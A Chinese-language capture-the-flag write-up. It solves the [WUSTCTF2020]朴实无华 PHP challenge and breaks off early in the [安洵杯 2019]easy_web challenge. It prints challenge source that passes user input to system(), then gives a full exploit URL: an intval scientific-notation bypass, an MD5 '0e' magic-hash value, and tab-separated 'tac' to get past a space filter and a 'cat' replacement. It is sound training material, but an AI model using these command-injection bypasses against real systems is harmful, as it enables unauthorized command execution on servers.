[WUSTCTF2020]朴实无华
- 目录扫描
- intval函数的科学记数法绕过
- MD5加密后与加密前相等
直接去扫目录,扫到了fl4g.php
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
第一层,利用科学计数法,2e4,当进行2e4+1的时候就变成了2e41,这样就绕过了这个函数
第二层,$md5==md5($md5)
,意思是md5加密前后相等,之前有做到过,用的是
第三层,第一个if就不要有空格,可以用%09来绕过,然后就是一个str_ireplace()函数
用tac就可以了
/fl4g.php/?num=2e4&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
[安洵杯 2019]easy_web
- 加密的探索
- include函数的猜测
- 强制类型转换的md5三等号绕过
有个隐藏的字体
目录扫描什么都没扫到
看url里面有个cmd
感觉绝大多数的命令都被过滤了,看前面的编码,试着拿去解密来探索一下他的加密过程,竟然真搞出来了,两次base64,再一次hex转字符串
拿CyberChef加密,包含一下index.php
源码拿到手